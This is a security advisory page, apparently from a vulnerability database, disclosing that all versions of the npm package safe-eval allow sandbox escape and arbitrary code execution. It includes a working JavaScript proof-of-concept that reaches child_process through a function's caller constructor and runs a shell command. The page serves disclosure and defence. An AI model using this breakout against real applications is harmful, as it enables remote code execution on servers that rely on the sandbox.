Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nodejsLily BlackNODEJS:1033
HistoryJul 02, 2019 - 8:41 p.m.

Sandbox Breakout / Arbitrary Code Execution

2019-07-0220:41:04
Lily Black
www.npmjs.com
9
JSON

Overview

All versions of safe-eval are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload chaining a function’s callee and caller constructors can escape the sandbox and execute arbitrary code.

For example, the payload

((() => { 
const targetKey = Object.keys(this)[0]; 
Object.defineProperty(this, targetKey, { 
get: function() { 
return arguments.callee.caller.constructor( 
"return global.process.mainModule.require('child_process').execSync('pwd').toString()" 
)(); 
} 
}); 
})();```
may be used to print the `pwd` to the console.

## Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.

## References

[GitHub Advisory](https://github.com/advisories/GHSA-9pcf-h8q9-63f6)
CPENameOperatorVersion
safe-evalge0.0.0
JSON